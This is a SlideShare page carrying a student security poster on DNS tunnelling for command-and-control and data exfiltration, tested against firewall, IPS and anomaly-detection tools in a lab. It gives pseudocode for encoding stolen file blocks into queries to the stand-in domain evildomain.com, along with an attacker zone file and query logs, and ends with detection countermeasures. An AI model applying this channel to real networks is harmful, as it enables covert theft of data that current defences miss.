SlideShare a Scribd company logo
1 of 1
Download to read offline
jminieri@gatech.edu
Corporate Name Server
Infected PC
Evil Name Server
Network Anomaly
Detection System
Next Generation
FirewallNetwork Intrusion
Prevention System
Internet
Data Exfiltration
Command & Control
Laboratory Environment
Conclusion & Countermeasures
Exfiltrating the Data
Infected Client:
1. Receives encrypted/encoded instructions from DNS query
“get SensitiveData.doc”= Base64Decode( AES128( id, Ksec,”wq8Hx50ab4TGOaWwEBhZO...” ))
2. Performs commands:
2a. Break SensitiveData.doc into blocks
2b. EncodedBlock = Base32Encode( AES128( id, Ksec, “get SensitiveData.doc”))
2c. Query EncodedBlock.evildomain.com
Evil Name Server:
1. Collects query logs for results:
query: 2ox4ttglxoxyxbrix2pbd4o4gtmkq56lakoo3pjnnhetwwibrlaa.evildomain.com IN A +
query: r7wbrme3udzoczqelfoqnx7qxysexynokg6eiotjy3mur7zrd3la.evildomain.com IN A +
query: zvev2wpzmfgcpbgboxi3yw3ivtgjaxf2eg3xumitf3xzetzn5uaa.evildomain.com IN A +
query: mzxnbmy73fjz6umqrgzstqatkm7ngifmdfxqwnnq52fekhzjod5a.evildomain.com IN A +
query: 4sjpqctnj6keacrt4jklpjpnyea67o76bgjyvjdj4odjcfngxlra.evildomain.com IN A +
query: 4hv2hu6ywklsclcs2xnsygrzmbpjz5ormdr27dfe24zwvglww5wa.evildomain.com IN A +
query: jrcnfvfxg7uieih7wtf3ecl3f2ux5f2zup2bwnrtm3fsv3cz7oca.evildomain.com IN A +
2. Reconstructs original data
Implementing a Stealthy C&C Channel
Infected Client:
1. Registers with Evil Name Server, Receives ID [clientid]
2. Queries clientid.evildomain.com for its instructions
Evil Name Server:
1. Populates TXT record for clientid with commands to execute
Base64Encode( AES128( id, Ksec, “get SensitiveData.doc”))
Background
Next-Generation Firewall -
- Does not see data exfiltration traffic as a Threat
- Only records DNS transactions as “traffic” mixed with other legitimate DNS traffic
- No alerts that exfiltration occurred
Network Anomaly Detection
- Basic thresholds are too high to detect activity
- Pushing thresholds for a group/network low causes false positives
- Baselining individual hosts is inaccurate on networks using DHCP
Network Intrusion Prevention System
- Signature based, no signatures for this type of traffic, no alerts
- May record DNS queries in general, but those queries are mixed with legitimate DNS traffic
The modern network security infrastructure remains inadequate to protect networks from this
vector of data loss.
Based on the advances in the areas of web content filtering and SPAM reduction, similar strategies
should be employed for the filtering and blocking of suspicious or unauthorized DNS queries:
Focus on the domain name:
1. Domain Name Reputation Service –
When was the domain registered? (recent = low reputation)
Who is the registrar? (are they reputable?)
How frequently are DNS records updated? (short TTL could suggest Fast Flux)
Age of specific DNS record. (new additions may be suspicious, old records may be trustworthy)
Links from known trusted sites (not search engines)
2. Domain Name Real Time Black Hole Service -
Implement DNS-based blackhole list (DNSBL)
3. Domain Name Categorization Service -
Domains are categorized based on content (similar to web content)
Domain administrators allow/deny queries based on categorization
Focus on network behavior:
1. Unusually high volumes of DNS traffic
Baseline of what is usual needs to be determined
White list capability to allow known CDN traffic
Not good against small amounts of data
These services should be integrated directly into bind; current services integrate with web content
filtering or mail relays.
Covert Channel – clandestine use of a shared resource to exchange information (e.g. tweaking bits
in an IP header, hiding a file in a cake!)
Domain Name Service – a ubiquitous system providing hostname to IP lookup services for devices
connecting to the Internet. (e.g. www.gatech.edu -> 130.207.160.29)
Why DNS as a covert channel?
- It’s used on every network connecting to the Internet
- Security Administrators must allow DNS traffic to ingress/egress a network perimeter
- RFC’s specify many flexible record types
- Many software vendors and content providers utilize this flexibility in the delivery of their products
Due to the assorted legitimate uses of DNS and the variety of of queries and response record
formats required by the RFC’s, detecting compliant but malicious DNS queries and
responses is difficult!
Network Anomaly Detection System
Next-Generation Firewall
RFC Compliant DNS
transactions are all
grouped together
No Threats Detected,
just DNS traffic
captured
Evildomain.com’s
$ORIGIN evildomain.com.
$TTL 3600
evildomain.com. SOA ns.evildomain.com. root (
20130311001 ; serial
900 ; refresh
600 ; retry
86400 ; expiry
3600 ) ; minimum
NS ns.evildomain.com.
; A 192.168.1.1
;
ns A 192.168.1.1
;
www A 172.16.1.1
1234567890123456 TXT wq8Hx50ab4TGOaWwEBhZOH/92EiiH3UgDpWj6FdBUNE=
1234567890123456 A 172.16.1.66
* A 172.16.1.66
Encrypted Command for
clientid 1234567890123456
DNS Wildcard record
prevents NXDOMAIN
messages as clients
exfiltrate data
Searching DNS Query Logs:
query: a1ad0a23d76406ca643d9131e3cb41272.profile.jfk5.cloudfront.net IN A +
query: a872519f3b7190734526511bebb226f0e.profile.sin2.cloudfront.net IN A +
query: a7ec25bb89c4452fb63759d20363071f5.profile.ewr2.cloudfront.net IN A +
query: ad572852c5270fac72fd9d8b2cfd3d306.profile.sin2.cloudfront.net IN A +
query: a875e52d696ae8e0ce28cd36a213daa57.profile.mia50.cloudfront.net IN A +
query: a18045c17467024a514b0ab79ecaa58e0.profile.sfo9.cloudfront.net IN A +
query: afa9724d8183a5f1c35353150682a23db.profile.sin3.cloudfront.net IN A +
query: af7575720d6325c162aa90008428ac27b.profile.iad12.cloudfront.net IN A +
query: a6e4c5b345cf0cbb25bf2711448bef95c.profile.fra6.cloudfront.net IN A +
query: a0a2a114aa395186ad2454d65879b9f7a.profile.jfk6.cloudfront.net IN A +
query: a42ce5df4536f21e11771d686469c6645.profile.lhr5.cloudfront.net IN A +
query: a5b3b21b9270043c539cfeabf26187996.profile.jfk1.cloudfront.net IN A +
query: a93b6a052e8c62437184f95a46227f1ae.profile.sea50.cloudfront.net IN A +
query: a9bc2b695ffb0e4a6d263be602bc27dfe.profile.stl2.cloudfront.net IN A +
query: a437f389280fe78c662d69017428c10d5.profile.syd1.cloudfront.net IN A +
query: a2fe3288bc1cf62ba63001dddfdcdb6ad.profile.nrt53.cloudfront.net IN A +
query: o2cmkso25fpbvm3h7qh7mjzmatjpve6u6gamlxbxj6pbhsufvgma.evildomain.com IN A +
query: dpasrf4e45duoma4cn37cmgcpafu6k4yqrt6gbm2nsnsg6anog3a.evildomain.com IN A +
query: rkd3cuxqbhneofaiu7g4ntqko5ksput6tm2yh5bxce6suwsert7q.evildomain.com IN A +
query: y4gaqwy7fz2nznmvlrpcjdmlgqxh2qec2sdz5n6yjgcm73lqpylq.evildomain.com IN A +
query: 7z74bbryi4evuc4zijblhf5eokttrel4sb7atuiiyezo4sp3ddhq.evildomain.com IN A +
query: v3nsmyoe4ip475ajbdjku3rjdt3s7innupyro57kdyra5y3z43oq.evildomain.com IN A +
query: xd6kkjm2jzzgbdf5mockkwetmmouqqlfw77nvn2g55bd4moktw3q.evildomain.com IN A +
query: gwunhw52v7v2ukfnhjxfq6uuk5nx4klciyqoyrza46w464q636qa.evildomain.com IN A +
query: da2xcedrixvwodam5el3pqh4prjck6hkghdzvsyulctitxvd3tgq.evildomain.com IN A +
query: kda3bxbc4rjsyyt2pcbdcqwnpm2ing5effvp24kbpgpvrnklio2a.evildomain.com IN A +
query: nfcsd7eylchbysavyd226vewp7si2wapigztpngug2mwjqdzetqq.evildomain.com IN A +
query: fktl5gt5whuzjof6rjdd4p4nl2n4tc6a725x6z4ojnmsfitsdpkq.evildomain.com IN A +
query: rhucuss5ltvl6ro6fihbezjfaicylazfswe5p5hv6eum353dkzla.evildomain.com IN A +
query: 7br6hg23wbzxya7oupimz5ofq57krsw4ahvblfqsodt2r4nkjunq.evildomain.com IN A +
query: 5rft2mx4lejdjccmemwqgdfykbwpgfku4sev2kb6rzs7adl4cxcq.evildomain.com IN A +
query: ntqa7b4n434zqbwdndxgq2xkxd5ws4daerqbhtrobess4uqq6ovq.evildomain.com IN A +
Exfiltrated data looks too much
like normal content delivery
network traffic; hostname entropy
detection yields false positives.
Network Intrusion Prevention System
Only DNS queries detected, no
DNS based threats; too much
query traffic to sort through
DNS traffic shows increase in flow report,
but overall volume of traffic is too low to
generate an alert or cause analysts to
notice.

More Related Content

What's hot

BSides SG Practical Red Teaming Workshop
BSides SG Practical Red Teaming WorkshopBSides SG Practical Red Teaming Workshop
BSides SG Practical Red Teaming WorkshopAjay Choudhary
 
Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]RootedCON
 
Fast Detection of New Malicious Domains using DNS
Fast Detection of New Malicious Domains using DNSFast Detection of New Malicious Domains using DNS
Fast Detection of New Malicious Domains using DNSOpenDNS
 
DEF CON 27 - GERALD DOUSSOT AND ROGER MEYER - state of dns rebinding attack ...
DEF CON 27 - GERALD DOUSSOT  AND ROGER MEYER - state of dns rebinding attack ...DEF CON 27 - GERALD DOUSSOT  AND ROGER MEYER - state of dns rebinding attack ...
DEF CON 27 - GERALD DOUSSOT AND ROGER MEYER - state of dns rebinding attack ...Felipe Prado
 
Deploying New DNSSEC Algorithms (IEPG@IETF93 - July 2015)
Deploying New DNSSEC Algorithms (IEPG@IETF93 - July 2015)Deploying New DNSSEC Algorithms (IEPG@IETF93 - July 2015)
Deploying New DNSSEC Algorithms (IEPG@IETF93 - July 2015)Dan York
 
New DNS Traffic Analysis Techniques to Identify Global Internet Threats
New DNS Traffic Analysis Techniques to Identify Global Internet ThreatsNew DNS Traffic Analysis Techniques to Identify Global Internet Threats
New DNS Traffic Analysis Techniques to Identify Global Internet ThreatsOpenDNS
 
DoH, DoT and ESNI
DoH, DoT and ESNIDoH, DoT and ESNI
DoH, DoT and ESNIJisc
 
Encrypted DNS - DNS over TLS / DNS over HTTPS
Encrypted DNS - DNS over TLS / DNS over HTTPSEncrypted DNS - DNS over TLS / DNS over HTTPS
Encrypted DNS - DNS over TLS / DNS over HTTPSAlex Mayrhofer
 
Carlos García - Pentesting Active Directory [rooted2018]
Carlos García - Pentesting Active Directory [rooted2018]Carlos García - Pentesting Active Directory [rooted2018]
Carlos García - Pentesting Active Directory [rooted2018]RootedCON
 
DNS OARC 27: DNS over IPv6 - A study in fragmentation
DNS OARC 27: DNS over IPv6 - A study in fragmentationDNS OARC 27: DNS over IPv6 - A study in fragmentation
DNS OARC 27: DNS over IPv6 - A study in fragmentationAPNIC
 
Hardening the Core of the Internet
Hardening the Core of the InternetHardening the Core of the Internet
Hardening the Core of the InternetRIPE NCC
 
Introduction DNSSec
Introduction DNSSecIntroduction DNSSec
Introduction DNSSecAFRINIC
 
Dns protocol design attacks and security
Dns protocol design attacks and securityDns protocol design attacks and security
Dns protocol design attacks and securityMichael Earls
 
Part 3 - Local Name Resolution in Linux, FreeBSD and macOS/iOS
Part 3 - Local Name Resolution in Linux, FreeBSD and macOS/iOSPart 3 - Local Name Resolution in Linux, FreeBSD and macOS/iOS
Part 3 - Local Name Resolution in Linux, FreeBSD and macOS/iOSMen and Mice
 

What's hot (20)

BSides SG Practical Red Teaming Workshop
BSides SG Practical Red Teaming WorkshopBSides SG Practical Red Teaming Workshop
BSides SG Practical Red Teaming Workshop
 
ION Bangladesh - DANE, DNSSEC, and TLS Testing in the Go6lab
ION Bangladesh - DANE, DNSSEC, and TLS Testing in the Go6labION Bangladesh - DANE, DNSSEC, and TLS Testing in the Go6lab
ION Bangladesh - DANE, DNSSEC, and TLS Testing in the Go6lab
 
Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]
 
Defcon
DefconDefcon
Defcon
 
Fast Detection of New Malicious Domains using DNS
Fast Detection of New Malicious Domains using DNSFast Detection of New Malicious Domains using DNS
Fast Detection of New Malicious Domains using DNS
 
DEF CON 27 - GERALD DOUSSOT AND ROGER MEYER - state of dns rebinding attack ...
DEF CON 27 - GERALD DOUSSOT  AND ROGER MEYER - state of dns rebinding attack ...DEF CON 27 - GERALD DOUSSOT  AND ROGER MEYER - state of dns rebinding attack ...
DEF CON 27 - GERALD DOUSSOT AND ROGER MEYER - state of dns rebinding attack ...
 
Deploying New DNSSEC Algorithms (IEPG@IETF93 - July 2015)
Deploying New DNSSEC Algorithms (IEPG@IETF93 - July 2015)Deploying New DNSSEC Algorithms (IEPG@IETF93 - July 2015)
Deploying New DNSSEC Algorithms (IEPG@IETF93 - July 2015)
 
New DNS Traffic Analysis Techniques to Identify Global Internet Threats
New DNS Traffic Analysis Techniques to Identify Global Internet ThreatsNew DNS Traffic Analysis Techniques to Identify Global Internet Threats
New DNS Traffic Analysis Techniques to Identify Global Internet Threats
 
DoH, DoT and ESNI
DoH, DoT and ESNIDoH, DoT and ESNI
DoH, DoT and ESNI
 
Encrypted DNS - DNS over TLS / DNS over HTTPS
Encrypted DNS - DNS over TLS / DNS over HTTPSEncrypted DNS - DNS over TLS / DNS over HTTPS
Encrypted DNS - DNS over TLS / DNS over HTTPS
 
Carlos García - Pentesting Active Directory [rooted2018]
Carlos García - Pentesting Active Directory [rooted2018]Carlos García - Pentesting Active Directory [rooted2018]
Carlos García - Pentesting Active Directory [rooted2018]
 
DNS OARC 27: DNS over IPv6 - A study in fragmentation
DNS OARC 27: DNS over IPv6 - A study in fragmentationDNS OARC 27: DNS over IPv6 - A study in fragmentation
DNS OARC 27: DNS over IPv6 - A study in fragmentation
 
Hardening the Core of the Internet
Hardening the Core of the InternetHardening the Core of the Internet
Hardening the Core of the Internet
 
IoT Secure Bootsrapping : ideas
IoT Secure Bootsrapping : ideasIoT Secure Bootsrapping : ideas
IoT Secure Bootsrapping : ideas
 
Introduction DNSSec
Introduction DNSSecIntroduction DNSSec
Introduction DNSSec
 
7 technical-dns-workshop-day3
7 technical-dns-workshop-day37 technical-dns-workshop-day3
7 technical-dns-workshop-day3
 
Dns protocol design attacks and security
Dns protocol design attacks and securityDns protocol design attacks and security
Dns protocol design attacks and security
 
Part 3 - Local Name Resolution in Linux, FreeBSD and macOS/iOS
Part 3 - Local Name Resolution in Linux, FreeBSD and macOS/iOSPart 3 - Local Name Resolution in Linux, FreeBSD and macOS/iOS
Part 3 - Local Name Resolution in Linux, FreeBSD and macOS/iOS
 
DNS Security
DNS SecurityDNS Security
DNS Security
 
8 technical-dns-workshop-day4
8 technical-dns-workshop-day48 technical-dns-workshop-day4
8 technical-dns-workshop-day4
 

Viewers also liked

Review of Intrusion and Anomaly Detection Techniques
Review of Intrusion and Anomaly Detection Techniques Review of Intrusion and Anomaly Detection Techniques
Review of Intrusion and Anomaly Detection Techniques IJMER
 
Ariu - Ph.D. Defense Slides
Ariu - Ph.D. Defense SlidesAriu - Ph.D. Defense Slides
Ariu - Ph.D. Defense SlidesPluribus One
 
A new clutering approach for anomaly intrusion detection
A new clutering approach for anomaly intrusion detectionA new clutering approach for anomaly intrusion detection
A new clutering approach for anomaly intrusion detectionIJDKP
 
3 Reasons Why The Host Rules Intrusion Detection in The Cloud
3 Reasons Why The Host Rules Intrusion Detection in The Cloud 3 Reasons Why The Host Rules Intrusion Detection in The Cloud
3 Reasons Why The Host Rules Intrusion Detection in The Cloud Threat Stack
 
Network-Based Intrusion Detection System
Network-Based Intrusion Detection SystemNetwork-Based Intrusion Detection System
Network-Based Intrusion Detection Systemjohnb0118
 
Intrusion detection system
Intrusion detection systemIntrusion detection system
Intrusion detection systemAAKASH S
 
Anomaly Detection for Security
Anomaly Detection for SecurityAnomaly Detection for Security
Anomaly Detection for SecurityCody Rioux
 
Artificial neural network for misuse detection
Artificial neural network for misuse detectionArtificial neural network for misuse detection
Artificial neural network for misuse detectionLikan Patra
 
Intrusion detection and prevention system
Intrusion detection and prevention systemIntrusion detection and prevention system
Intrusion detection and prevention systemNikhil Raj
 
Intrusion detection system
Intrusion detection system Intrusion detection system
Intrusion detection system gaurav koriya
 
Intrusion detection system
Intrusion detection systemIntrusion detection system
Intrusion detection systemAkhil Kumar
 
Intrusion prevention system(ips)
Intrusion prevention system(ips)Intrusion prevention system(ips)
Intrusion prevention system(ips)Papun Papun
 
Intrusion detection system ppt
Intrusion detection system pptIntrusion detection system ppt
Intrusion detection system pptSheetal Verma
 

Viewers also liked (17)

Review of Intrusion and Anomaly Detection Techniques
Review of Intrusion and Anomaly Detection Techniques Review of Intrusion and Anomaly Detection Techniques
Review of Intrusion and Anomaly Detection Techniques
 
P47 Eait06
P47 Eait06P47 Eait06
P47 Eait06
 
Ariu - Ph.D. Defense Slides
Ariu - Ph.D. Defense SlidesAriu - Ph.D. Defense Slides
Ariu - Ph.D. Defense Slides
 
A new clutering approach for anomaly intrusion detection
A new clutering approach for anomaly intrusion detectionA new clutering approach for anomaly intrusion detection
A new clutering approach for anomaly intrusion detection
 
IDS n IPS
IDS n IPSIDS n IPS
IDS n IPS
 
3 Reasons Why The Host Rules Intrusion Detection in The Cloud
3 Reasons Why The Host Rules Intrusion Detection in The Cloud 3 Reasons Why The Host Rules Intrusion Detection in The Cloud
3 Reasons Why The Host Rules Intrusion Detection in The Cloud
 
Network-Based Intrusion Detection System
Network-Based Intrusion Detection SystemNetwork-Based Intrusion Detection System
Network-Based Intrusion Detection System
 
Intrusion detection system
Intrusion detection systemIntrusion detection system
Intrusion detection system
 
IDS and IPS
IDS and IPSIDS and IPS
IDS and IPS
 
Anomaly Detection for Security
Anomaly Detection for SecurityAnomaly Detection for Security
Anomaly Detection for Security
 
Artificial neural network for misuse detection
Artificial neural network for misuse detectionArtificial neural network for misuse detection
Artificial neural network for misuse detection
 
Intrusion Prevention System
Intrusion Prevention SystemIntrusion Prevention System
Intrusion Prevention System
 
Intrusion detection and prevention system
Intrusion detection and prevention systemIntrusion detection and prevention system
Intrusion detection and prevention system
 
Intrusion detection system
Intrusion detection system Intrusion detection system
Intrusion detection system
 
Intrusion detection system
Intrusion detection systemIntrusion detection system
Intrusion detection system
 
Intrusion prevention system(ips)
Intrusion prevention system(ips)Intrusion prevention system(ips)
Intrusion prevention system(ips)
 
Intrusion detection system ppt
Intrusion detection system pptIntrusion detection system ppt
Intrusion detection system ppt
 

Similar to Minieri CS6262 Project Poster

Early Detection of Malicious Activity—How Well Do You Know Your DNS?
Early Detection of Malicious Activity—How Well Do You Know Your DNS?Early Detection of Malicious Activity—How Well Do You Know Your DNS?
Early Detection of Malicious Activity—How Well Do You Know Your DNS?Priyanka Aash
 
DNSSEC Tutorial, by Champika Wijayatunga [APNIC 38]
DNSSEC Tutorial, by Champika Wijayatunga [APNIC 38]DNSSEC Tutorial, by Champika Wijayatunga [APNIC 38]
DNSSEC Tutorial, by Champika Wijayatunga [APNIC 38]APNIC
 
DNS_Tutorial 2.pptx
DNS_Tutorial 2.pptxDNS_Tutorial 2.pptx
DNS_Tutorial 2.pptxviditsir
 
DNS Exfiltration and Out-of-bound attacks
DNS Exfiltration and Out-of-bound attacksDNS Exfiltration and Out-of-bound attacks
DNS Exfiltration and Out-of-bound attacksNitesh Shilpkar
 
5.Dns Rpc Nfs
5.Dns Rpc Nfs5.Dns Rpc Nfs
5.Dns Rpc Nfsphanleson
 
5.Dns Rpc Nfs 2
5.Dns Rpc Nfs 25.Dns Rpc Nfs 2
5.Dns Rpc Nfs 2phanleson
 
Mens jan piet_dnssec-in-practice
Mens jan piet_dnssec-in-practiceMens jan piet_dnssec-in-practice
Mens jan piet_dnssec-in-practicekuchinskaya
 
Leveraging DNS to Surface Attacker Activity
Leveraging DNS to Surface Attacker ActivityLeveraging DNS to Surface Attacker Activity
Leveraging DNS to Surface Attacker ActivitySqrrl
 
Network Intelligence for a secured Network (2014-03-12)
Network Intelligence for a secured Network (2014-03-12)Network Intelligence for a secured Network (2014-03-12)
Network Intelligence for a secured Network (2014-03-12)Andreas Taudte
 
Monitoring for DNS Security
Monitoring for DNS SecurityMonitoring for DNS Security
Monitoring for DNS SecurityThousandEyes
 
Content Navigation
Content NavigationContent Navigation
Content Navigationsanjoysanyal
 
NANOG32 - DNS Anomalies and Their Impacts on DNS Cache Servers
NANOG32 - DNS Anomalies and Their Impacts on DNS Cache ServersNANOG32 - DNS Anomalies and Their Impacts on DNS Cache Servers
NANOG32 - DNS Anomalies and Their Impacts on DNS Cache ServersChika Yoshimura
 

Similar to Minieri CS6262 Project Poster (20)

ION Bucharest - Deploying DNSSEC
ION Bucharest - Deploying DNSSECION Bucharest - Deploying DNSSEC
ION Bucharest - Deploying DNSSEC
 
Early Detection of Malicious Activity—How Well Do You Know Your DNS?
Early Detection of Malicious Activity—How Well Do You Know Your DNS?Early Detection of Malicious Activity—How Well Do You Know Your DNS?
Early Detection of Malicious Activity—How Well Do You Know Your DNS?
 
DNSSEC Tutorial, by Champika Wijayatunga [APNIC 38]
DNSSEC Tutorial, by Champika Wijayatunga [APNIC 38]DNSSEC Tutorial, by Champika Wijayatunga [APNIC 38]
DNSSEC Tutorial, by Champika Wijayatunga [APNIC 38]
 
DNS_Tutorial 2.pptx
DNS_Tutorial 2.pptxDNS_Tutorial 2.pptx
DNS_Tutorial 2.pptx
 
DNS Exfiltration and Out-of-bound attacks
DNS Exfiltration and Out-of-bound attacksDNS Exfiltration and Out-of-bound attacks
DNS Exfiltration and Out-of-bound attacks
 
DNS - MCSE 2019
DNS - MCSE 2019DNS - MCSE 2019
DNS - MCSE 2019
 
5.Dns Rpc Nfs
5.Dns Rpc Nfs5.Dns Rpc Nfs
5.Dns Rpc Nfs
 
5.Dns Rpc Nfs 2
5.Dns Rpc Nfs 25.Dns Rpc Nfs 2
5.Dns Rpc Nfs 2
 
Mens jan piet_dnssec-in-practice
Mens jan piet_dnssec-in-practiceMens jan piet_dnssec-in-practice
Mens jan piet_dnssec-in-practice
 
Hands-on DNSSEC Deployment
Hands-on DNSSEC DeploymentHands-on DNSSEC Deployment
Hands-on DNSSEC Deployment
 
Bo2004
Bo2004Bo2004
Bo2004
 
VolgaCTF | Bo0oM - DNS and attacks
VolgaCTF | Bo0oM - DNS and attacksVolgaCTF | Bo0oM - DNS and attacks
VolgaCTF | Bo0oM - DNS and attacks
 
Introduction
IntroductionIntroduction
Introduction
 
Leveraging DNS to Surface Attacker Activity
Leveraging DNS to Surface Attacker ActivityLeveraging DNS to Surface Attacker Activity
Leveraging DNS to Surface Attacker Activity
 
Network Intelligence for a secured Network (2014-03-12)
Network Intelligence for a secured Network (2014-03-12)Network Intelligence for a secured Network (2014-03-12)
Network Intelligence for a secured Network (2014-03-12)
 
Network security
Network securityNetwork security
Network security
 
Understanding DNS Security
Understanding DNS SecurityUnderstanding DNS Security
Understanding DNS Security
 
Monitoring for DNS Security
Monitoring for DNS SecurityMonitoring for DNS Security
Monitoring for DNS Security
 
Content Navigation
Content NavigationContent Navigation
Content Navigation
 
NANOG32 - DNS Anomalies and Their Impacts on DNS Cache Servers
NANOG32 - DNS Anomalies and Their Impacts on DNS Cache ServersNANOG32 - DNS Anomalies and Their Impacts on DNS Cache Servers
NANOG32 - DNS Anomalies and Their Impacts on DNS Cache Servers
 

Minieri CS6262 Project Poster

  • 1. jminieri@gatech.edu Corporate Name Server Infected PC Evil Name Server Network Anomaly Detection System Next Generation FirewallNetwork Intrusion Prevention System Internet Data Exfiltration Command & Control Laboratory Environment Conclusion & Countermeasures Exfiltrating the Data Infected Client: 1. Receives encrypted/encoded instructions from DNS query “get SensitiveData.doc”= Base64Decode( AES128( id, Ksec,”wq8Hx50ab4TGOaWwEBhZO...” )) 2. Performs commands: 2a. Break SensitiveData.doc into blocks 2b. EncodedBlock = Base32Encode( AES128( id, Ksec, “get SensitiveData.doc”)) 2c. Query EncodedBlock.evildomain.com Evil Name Server: 1. Collects query logs for results: query: 2ox4ttglxoxyxbrix2pbd4o4gtmkq56lakoo3pjnnhetwwibrlaa.evildomain.com IN A + query: r7wbrme3udzoczqelfoqnx7qxysexynokg6eiotjy3mur7zrd3la.evildomain.com IN A + query: zvev2wpzmfgcpbgboxi3yw3ivtgjaxf2eg3xumitf3xzetzn5uaa.evildomain.com IN A + query: mzxnbmy73fjz6umqrgzstqatkm7ngifmdfxqwnnq52fekhzjod5a.evildomain.com IN A + query: 4sjpqctnj6keacrt4jklpjpnyea67o76bgjyvjdj4odjcfngxlra.evildomain.com IN A + query: 4hv2hu6ywklsclcs2xnsygrzmbpjz5ormdr27dfe24zwvglww5wa.evildomain.com IN A + query: jrcnfvfxg7uieih7wtf3ecl3f2ux5f2zup2bwnrtm3fsv3cz7oca.evildomain.com IN A + 2. Reconstructs original data Implementing a Stealthy C&C Channel Infected Client: 1. Registers with Evil Name Server, Receives ID [clientid] 2. Queries clientid.evildomain.com for its instructions Evil Name Server: 1. Populates TXT record for clientid with commands to execute Base64Encode( AES128( id, Ksec, “get SensitiveData.doc”)) Background Next-Generation Firewall - - Does not see data exfiltration traffic as a Threat - Only records DNS transactions as “traffic” mixed with other legitimate DNS traffic - No alerts that exfiltration occurred Network Anomaly Detection - Basic thresholds are too high to detect activity - Pushing thresholds for a group/network low causes false positives - Baselining individual hosts is inaccurate on networks using DHCP Network Intrusion Prevention System - Signature based, no signatures for this type of traffic, no alerts - May record DNS queries in general, but those queries are mixed with legitimate DNS traffic The modern network security infrastructure remains inadequate to protect networks from this vector of data loss. Based on the advances in the areas of web content filtering and SPAM reduction, similar strategies should be employed for the filtering and blocking of suspicious or unauthorized DNS queries: Focus on the domain name: 1. Domain Name Reputation Service – When was the domain registered? (recent = low reputation) Who is the registrar? (are they reputable?) How frequently are DNS records updated? (short TTL could suggest Fast Flux) Age of specific DNS record. (new additions may be suspicious, old records may be trustworthy) Links from known trusted sites (not search engines) 2. Domain Name Real Time Black Hole Service - Implement DNS-based blackhole list (DNSBL) 3. Domain Name Categorization Service - Domains are categorized based on content (similar to web content) Domain administrators allow/deny queries based on categorization Focus on network behavior: 1. Unusually high volumes of DNS traffic Baseline of what is usual needs to be determined White list capability to allow known CDN traffic Not good against small amounts of data These services should be integrated directly into bind; current services integrate with web content filtering or mail relays. Covert Channel – clandestine use of a shared resource to exchange information (e.g. tweaking bits in an IP header, hiding a file in a cake!) Domain Name Service – a ubiquitous system providing hostname to IP lookup services for devices connecting to the Internet. (e.g. www.gatech.edu -> 130.207.160.29) Why DNS as a covert channel? - It’s used on every network connecting to the Internet - Security Administrators must allow DNS traffic to ingress/egress a network perimeter - RFC’s specify many flexible record types - Many software vendors and content providers utilize this flexibility in the delivery of their products Due to the assorted legitimate uses of DNS and the variety of of queries and response record formats required by the RFC’s, detecting compliant but malicious DNS queries and responses is difficult! Network Anomaly Detection System Next-Generation Firewall RFC Compliant DNS transactions are all grouped together No Threats Detected, just DNS traffic captured Evildomain.com’s $ORIGIN evildomain.com. $TTL 3600 evildomain.com. SOA ns.evildomain.com. root ( 20130311001 ; serial 900 ; refresh 600 ; retry 86400 ; expiry 3600 ) ; minimum NS ns.evildomain.com. ; A 192.168.1.1 ; ns A 192.168.1.1 ; www A 172.16.1.1 1234567890123456 TXT wq8Hx50ab4TGOaWwEBhZOH/92EiiH3UgDpWj6FdBUNE= 1234567890123456 A 172.16.1.66 * A 172.16.1.66 Encrypted Command for clientid 1234567890123456 DNS Wildcard record prevents NXDOMAIN messages as clients exfiltrate data Searching DNS Query Logs: query: a1ad0a23d76406ca643d9131e3cb41272.profile.jfk5.cloudfront.net IN A + query: a872519f3b7190734526511bebb226f0e.profile.sin2.cloudfront.net IN A + query: a7ec25bb89c4452fb63759d20363071f5.profile.ewr2.cloudfront.net IN A + query: ad572852c5270fac72fd9d8b2cfd3d306.profile.sin2.cloudfront.net IN A + query: a875e52d696ae8e0ce28cd36a213daa57.profile.mia50.cloudfront.net IN A + query: a18045c17467024a514b0ab79ecaa58e0.profile.sfo9.cloudfront.net IN A + query: afa9724d8183a5f1c35353150682a23db.profile.sin3.cloudfront.net IN A + query: af7575720d6325c162aa90008428ac27b.profile.iad12.cloudfront.net IN A + query: a6e4c5b345cf0cbb25bf2711448bef95c.profile.fra6.cloudfront.net IN A + query: a0a2a114aa395186ad2454d65879b9f7a.profile.jfk6.cloudfront.net IN A + query: a42ce5df4536f21e11771d686469c6645.profile.lhr5.cloudfront.net IN A + query: a5b3b21b9270043c539cfeabf26187996.profile.jfk1.cloudfront.net IN A + query: a93b6a052e8c62437184f95a46227f1ae.profile.sea50.cloudfront.net IN A + query: a9bc2b695ffb0e4a6d263be602bc27dfe.profile.stl2.cloudfront.net IN A + query: a437f389280fe78c662d69017428c10d5.profile.syd1.cloudfront.net IN A + query: a2fe3288bc1cf62ba63001dddfdcdb6ad.profile.nrt53.cloudfront.net IN A + query: o2cmkso25fpbvm3h7qh7mjzmatjpve6u6gamlxbxj6pbhsufvgma.evildomain.com IN A + query: dpasrf4e45duoma4cn37cmgcpafu6k4yqrt6gbm2nsnsg6anog3a.evildomain.com IN A + query: rkd3cuxqbhneofaiu7g4ntqko5ksput6tm2yh5bxce6suwsert7q.evildomain.com IN A + query: y4gaqwy7fz2nznmvlrpcjdmlgqxh2qec2sdz5n6yjgcm73lqpylq.evildomain.com IN A + query: 7z74bbryi4evuc4zijblhf5eokttrel4sb7atuiiyezo4sp3ddhq.evildomain.com IN A + query: v3nsmyoe4ip475ajbdjku3rjdt3s7innupyro57kdyra5y3z43oq.evildomain.com IN A + query: xd6kkjm2jzzgbdf5mockkwetmmouqqlfw77nvn2g55bd4moktw3q.evildomain.com IN A + query: gwunhw52v7v2ukfnhjxfq6uuk5nx4klciyqoyrza46w464q636qa.evildomain.com IN A + query: da2xcedrixvwodam5el3pqh4prjck6hkghdzvsyulctitxvd3tgq.evildomain.com IN A + query: kda3bxbc4rjsyyt2pcbdcqwnpm2ing5effvp24kbpgpvrnklio2a.evildomain.com IN A + query: nfcsd7eylchbysavyd226vewp7si2wapigztpngug2mwjqdzetqq.evildomain.com IN A + query: fktl5gt5whuzjof6rjdd4p4nl2n4tc6a725x6z4ojnmsfitsdpkq.evildomain.com IN A + query: 